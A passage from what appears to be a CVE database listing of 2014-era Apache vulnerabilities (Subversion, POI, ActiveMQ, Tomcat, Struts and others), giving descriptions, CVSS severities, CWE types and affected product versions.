apache wicket 6.3.0
apache wicket 6.6.0
apache wicket 6.9.1
apache wicket 6.12.0
apache wicket 6.1.1
apache wicket 6.4.0
apache wicket 6.13.0
apache wicket 6.11.0
apache wicket 6.14.0
apache wicket 6.0.0
apache wicket 6.16.0
CVE-2014-3528 MEDIUM

Apache Subversion 1.0.0 through 1.7.x before 1.7.17 and 1.8.x before 1.8.10 uses an MD5 hash of the URL and authentication realm to store cached credentials, which makes it easier for remote servers to obtain the credentials via a crafted authentication realm.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.1.2
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 1.0.8
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.0.0
apache subversion 1.6.3
redhat enterprise_linux_workstation 6.0
apache subversion 1.5.8
apache subversion 1.2.3
redhat enterprise_linux_server 7.0
apache subversion 1.7.3
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.14
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.5.2
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 1.7.6
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.6
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.3.2
apache subversion 1.8.8
redhat enterprise_linux_server_eus 6.6.z
apache subversion 1.6.6
redhat enterprise_linux_hpc_node 7.0
apache subversion 1.5.3
apache subversion 1.0.6
apache subversion 1.6.11
apache subversion 1.7.11
redhat enterprise_linux_hpc_node 6.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 1.3.1
apache subversion 1.8.6
apache subversion 1.6.20
apache subversion 1.1.4
opensuse opensuse 12.3
apache subversion 1.7.12
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.8.4
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
canonical ubuntu_linux 12.04
apache subversion 1.6.4
apache subversion 1.6.9
canonical ubuntu_linux 14.04
opensuse opensuse 13.1
apache subversion 1.0.9
apache subversion 1.6.19
apache subversion 1.7.9
redhat enterprise_linux_desktop 7.0
apache subversion 1.5.4
redhat enterprise_linux_workstation 7.0
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 1.8.3
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion 1.4.1
CVE-2014-3529 MEDIUM

The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers to read arbitrary files via an OpenXML file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache poi 3.0.1
apache poi 3.2
apache poi 0.13.0
apache poi 1.0.0
apache poi 1.8
apache poi 0.1
apache poi 1.0.1
apache poi 3.6
apache poi 0.4
apache poi 2.0
apache poi 3.0.2
apache poi 1.10
apache poi 0.2
apache poi *
apache poi 1.7
apache poi 0.7
apache poi 0.3
apache poi 0.5
apache poi 0.12.0
apache poi 3.5
apache poi 0.6
apache poi 3.0
apache poi 0.11.0
apache poi 1.5
apache poi 3.7
apache poi 0.14.0
apache poi 1.1.0
apache poi 3.8
apache poi 2.5.1
apache poi 1.0.2
apache poi 2.5
apache poi 3.9
apache poi 3.10
apache poi 1.2.0
apache poi 1.5.1
apache poi 3.1
apache poi 0.10.0
CVE-2014-3574 MEDIUM

Apache POI before 3.10.1 and 3.11.x before 3.11-beta2 allows remote attackers to cause a denial of service (CPU consumption and crash) via a crafted OOXML file, aka an XML Entity Expansion (XEE) attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache poi 3.0.1
apache poi 3.2
apache poi 0.13.0
apache poi 1.0.0
apache poi 1.8
apache poi 0.1
apache poi 1.0.1
apache poi 3.6
apache poi 0.4
apache poi 2.0
apache poi 3.0.2
apache poi 1.10
apache poi 0.2
apache poi *
apache poi 1.7
apache poi 0.7
apache poi 0.3
apache poi 0.5
apache poi 0.12.0
apache poi 3.5
apache poi 0.6
apache poi 3.0
apache poi 0.11.0
apache poi 1.5
apache poi 3.7
apache poi 0.14.0
apache poi 1.1.0
apache poi 3.8
apache poi 2.5.1
apache poi 1.0.2
apache poi 2.5
apache poi 3.9
apache poi 3.10
apache poi 1.2.0
apache poi 1.5.1
apache poi 3.1
apache poi 0.10.0
apache poi 3.11
CVE-2014-3575 MEDIUM

The OLE preview generation in Apache OpenOffice before 4.1.1 and OpenOffice.org (OOo) might allow remote attackers to embed arbitrary data into documents via crafted OLE objects.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openoffice *
redhat enterprise_linux_desktop 7.0
libreoffice libreoffice *
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2014-3576 MEDIUM

The processControlCommand function in broker/TransportConnection.java in Apache ActiveMQ before 5.11.0 allows remote attackers to cause a denial of service (shutdown) via a shutdown command.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
oracle fusion_middleware 9.0
oracle fusion_middleware 8.1
oracle fusion_middleware 12.1.3.0.0
apache activemq *
oracle business_intelligence_publisher 12.2.1.0.0
oracle fusion_middleware 11.1.1.7.4
CVE-2014-3577 MEDIUM

org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a "CN=" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the "foo,CN=www.apache.org" string in the O field.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache httpclient *
apache httpasyncclient *
CVE-2014-3579 HIGH

XML external entity (XXE) vulnerability in Apache ActiveMQ Apollo 1.x before 1.7.1 allows remote consumers to have unspecified impact via vectors involving an XPath based selector when dequeuing XML messages.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache activemq_apollo 1.1
apache activemq_apollo 1.5
apache activemq_apollo 1.4
apache activemq_apollo 1.7
apache activemq_apollo 1.2
apache activemq_apollo 1.3
apache activemq_apollo 1.6
apache activemq_apollo 1.0
CVE-2014-3580 MEDIUM

The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.19
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.1.2
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 1.0.8
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.0.0
apache subversion 1.6.3
redhat enterprise_linux_workstation 6.0
apache subversion 1.5.8
apache subversion 1.2.3
redhat enterprise_linux_server 7.0
apache subversion 1.7.3
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.14
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.5.2
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 1.7.6
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.6
apache subversion 1.6.7
apache subversion 1.4.4
debian debian_linux 7.0
apache subversion 1.3.0
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.3.2
apache subversion 1.8.8
redhat enterprise_linux_server_eus 6.6.z
apache subversion 1.6.6
redhat enterprise_linux_hpc_node 7.0
apache subversion 1.5.3
apache subversion 1.0.6
apache subversion 1.6.11
apache subversion 1.7.11
redhat enterprise_linux_hpc_node 6.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 1.3.1
apache subversion 1.8.6
apache subversion 1.6.20
apache subversion 1.1.4
apache subversion 1.7.12
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.8.4
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.6.19
apache subversion 1.7.9
redhat enterprise_linux_desktop 7.0
apache subversion 1.5.4
redhat enterprise_linux_workstation 7.0
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 1.8.3
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion 1.4.1
CVE-2014-3581 MEDIUM

The cache_merge_headers_out function in modules/cache/cache_util.c in the mod_cache module in the Apache HTTP Server before 2.4.11 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty HTTP Content-Type header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server 2.4.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
apache http_server 2.4.2
redhat enterprise_linux_eus 7.6
apache http_server 2.4.3
apache http_server 2.4.10
canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
apache http_server 2.4.1
oracle enterprise_manager_ops_center 12.2.0
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
oracle enterprise_manager_ops_center 12.2.1
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
oracle linux 6
canonical ubuntu_linux 10.04
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
apache http_server 2.4.6
apache http_server 2.4.4
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_server_tus 7.7
oracle enterprise_manager_ops_center 12.3.0
apache http_server 2.4.9
canonical ubuntu_linux 14.10
oracle enterprise_manager_ops_center *
redhat enterprise_linux_server 7.0
CVE-2014-3582 HIGH

In Ambari 1.2.0 through 2.2.2, it may be possible to execute arbitrary system commands on the Ambari Server host while generating SSL certificates for hosts in an Ambari cluster.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache ambari *
CVE-2014-3583 MEDIUM

The handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apple os_x_server 5.0.3
apple mac_os_x 10.10.2
canonical ubuntu_linux 10.04
apple mac_os_x 10.10.0
apple mac_os_x 10.10.1
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apple mac_os_x 10.10.4
apple mac_os_x 10.9.5
canonical ubuntu_linux 14.04
apple mac_os_x 10.10.3
canonical ubuntu_linux 14.10
CVE-2014-3584 MEDIUM

The SamlHeaderInHandler in Apache CXF before 2.6.11, 2.7.x before 2.7.8, and 3.0.x before 3.0.1 allows remote attackers to cause a denial of service (infinite loop) via a crafted SAML token in the authorization header of a request to a JAX-RS service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.1
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.7.1
apache cxf *
apache cxf 3.0.0
apache cxf 2.7.3
apache cxf 2.7.2
apache cxf 2.7.4
apache cxf 2.7.6
CVE-2014-3596 MEDIUM

The getCN function in Apache Axis 1.4 and earlier does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5784.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache axis 1.1
apache axis 1.2.1
apache axis 1.2
apache axis *
apache axis 1.3
apache axis 1.0
CVE-2014-3600 HIGH

XML external entity (XXE) vulnerability in Apache ActiveMQ 5.x before 5.10.1 allows remote consumers to have unspecified impact via vectors involving an XPath based selector when dequeuing XML messages.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2014-3612 HIGH

The LDAPLoginModule implementation in the Java Authentication and Authorization Service (JAAS) in Apache ActiveMQ 5.x before 5.10.1 allows remote attackers to bypass authentication by logging in with an empty password and valid username, which triggers an unauthenticated bind. NOTE: this identifier has been SPLIT per ADT2 due to different vulnerability types. See CVE-2015-6524 for the use of wildcard operators in usernames.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2014-3623 MEDIUM

Apache WSS4J before 1.6.17 and 2.x before 2.0.2, as used in Apache CXF 2.7.x before 2.7.13 and 3.0.x before 3.0.2, when using TransportBinding, does not properly enforce the SAML SubjectConfirmation method security semantics, which allows remote attackers to conduct spoofing attacks via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf *
apache wss4j *
CVE-2014-3624 HIGH

Apache Traffic Server 5.1.x before 5.1.1 allows remote attackers to bypass access restrictions by leveraging failure to properly tunnel remap requests using CONNECT.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache traffic_server 5.1.0
CVE-2014-3627 MEDIUM

The YARN NodeManager daemon in Apache Hadoop 0.23.0 through 0.23.11 and 2.x before 2.5.2, when using Kerberos authentication, allows remote cluster users to change the permissions of certain files to world-readable via a symlink attack in a public tar archive, which is not properly handled during localization, related to distributed cache.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache hadoop 2.0.5
apache hadoop 2.4.1
apache hadoop 0.23.4
apache hadoop 0.23.3
apache hadoop 2.0.2
apache hadoop 0.23.8
apache hadoop 2.5.0
apache hadoop 0.23.7
apache hadoop 2.0.0
apache hadoop 2.2.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 0.23.1
apache hadoop 2.0.1
apache hadoop 0.23.6
apache hadoop 0.23.5
apache hadoop 2.1.0
apache hadoop 2.1.1
apache hadoop 0.23.11
apache hadoop 2.3.0
apache hadoop 2.5.1
apache hadoop 0.23.10
apache hadoop 2.0.4
apache hadoop 2.4.0
apache hadoop 0.23.0
apache hadoop 0.23.9
CVE-2014-3628 MEDIUM

Cross-site scripting (XSS) vulnerability in the Admin UI Plugin / Stats page in Apache Solr 4.x before 4.10.3 allows remote attackers to inject arbitrary web script or HTML via the fieldvaluecache object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr 4.2.0
apache solr 4.5.0
apache solr 4.7.2
apache solr 4.10.2
apache solr 4.9.0
apache solr 4.1.0
apache solr 4.6.0
apache solr 4.9.1
apache solr 4.10.0
apache solr 4.0.0
apache solr 4.3.0
apache solr 4.3.1
apache solr 4.8.1
apache solr 4.7.1
apache solr 4.2.1
apache solr 4.10.1
apache solr 4.7.0
apache solr 4.5.1
apache solr 4.4.0
apache solr 4.8.0
apache solr 4.6.1
CVE-2014-3629 MEDIUM

XML external entity (XXE) vulnerability in the XML Exchange module in Apache Qpid 0.30 allows remote attackers to cause outgoing HTTP connections via a crafted message.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache qpid 0.30
CVE-2014-4651 HIGH

It was found that the jclouds scriptbuilder Statements class wrote a temporary file to a predictable location. An attacker could use this flaw to access sensitive data, cause a denial of service, or perform other attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache jclouds *
CVE-2014-7807 MEDIUM

Apache CloudStack 4.3.x before 4.3.2 and 4.4.x before 4.4.2 allows remote attackers to bypass authentication via a login request without a password, which triggers an unauthenticated bind.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cloudstack 4.3.0
apache cloudstack 4.4.1
apache cloudstack 4.4.0
apache cloudstack 4.3.1
CVE-2014-7808 MEDIUM

Apache Wicket before 1.5.13, 6.x before 6.19.0, and 7.x before 7.0.0-M5 make it easier for attackers to defeat a cryptographic protection mechanism and predict encrypted URLs by leveraging use of CryptoMapper as the default encryption provider.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache wicket 7.0.0
apache wicket *
CVE-2014-7809 MEDIUM

Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.16
CVE-2014-7810 MEDIUM

The Expression Language (EL) implementation in Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not properly consider the possibility of an accessible interface implemented by an inaccessible class, which allows attackers to bypass a SecurityManager protection mechanism via a web application that leverages use of incorrect privileges during EL evaluation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 8.0.8
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 6.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2014-8108 MEDIUM

The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.7.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a request for a URI that triggers a lookup for a virtual transaction name that does not exist.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.7.19
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.1.2
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 1.0.8
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 1.5.8
apache subversion 1.2.3
redhat enterprise_linux_server 7.0
apache subversion 1.7.3
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.14
apache subversion 1.6.0
apache subversion 1.5.2
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 1.7.6
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.6
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.3.2
apache subversion 1.8.8
apache subversion 1.6.6
redhat enterprise_linux_hpc_node 7.0
apache subversion 1.5.3
apache subversion 1.0.6
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 1.3.1
apache subversion 1.8.6
apache subversion 1.6.20
apache subversion 1.1.4
apache subversion 1.7.12
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.8.4
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.6.19
apache subversion 1.7.9
redhat enterprise_linux_desktop 7.0
apache subversion 1.5.4
redhat enterprise_linux_workstation 7.0
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 1.8.3
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion 1.4.1
CVE-2014-8109 MEDIUM

mod_lua.c in the mod_lua module in the Apache HTTP Server 2.3.x and 2.4.x through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache http_server 2.4.7
canonical ubuntu_linux 10.04
fedoraproject fedora 21
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.4
apache http_server 2.4.3
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apache http_server 2.4.1
oracle enterprise_manager_ops_center 12.2.0
canonical ubuntu_linux 14.04
oracle enterprise_manager_ops_center 12.3.0
apache http_server 2.4.9
canonical ubuntu_linux 14.10
oracle enterprise_manager_ops_center 12.2.1
oracle enterprise_manager_ops_center *
CVE-2014-8110 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the web based administration console in Apache ActiveMQ 5.x before 5.10.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2014-8111 MEDIUM

Apache Tomcat Connectors (mod_jk) before 1.2.41 ignores JkUnmount rules for subtrees of previous JkMount rules, which allows remote attackers to access otherwise restricted artifacts via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat_connectors *
CVE-2014-8152 MEDIUM

Apache Santuario XML Security for Java 2.0.x before 2.0.3 allows remote attackers to bypass the streaming XML signature protection mechanism via a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java 2.0.0
apache santuario_xml_security_for_java 2.0.2
apache santuario_xml_security_for_java 2.0.1
CVE-2014-9527 MEDIUM

HSLFSlideShow in Apache POI before 3.11 allows remote attackers to cause a denial of service (infinite loop and deadlock) via a crafted PPT file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
fedoraproject fedora 20
apache poi *
CVE-2014-9593 MEDIUM

Apache CloudStack before 4.3.2 and 4.4.x before 4.4.2 allows remote attackers to obtain private keys via a listSslCerts API call.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cloudstack 4.4.1
apache cloudstack *
apache cloudstack 4.4.0
CVE-2015-0202 HIGH

The mod_dav_svn server in Subversion 1.8.0 through 1.8.11 allows remote attackers to cause a denial of service (memory consumption) via a large number of REPORT requests, which trigger the traversal of FSFS repository nodes.

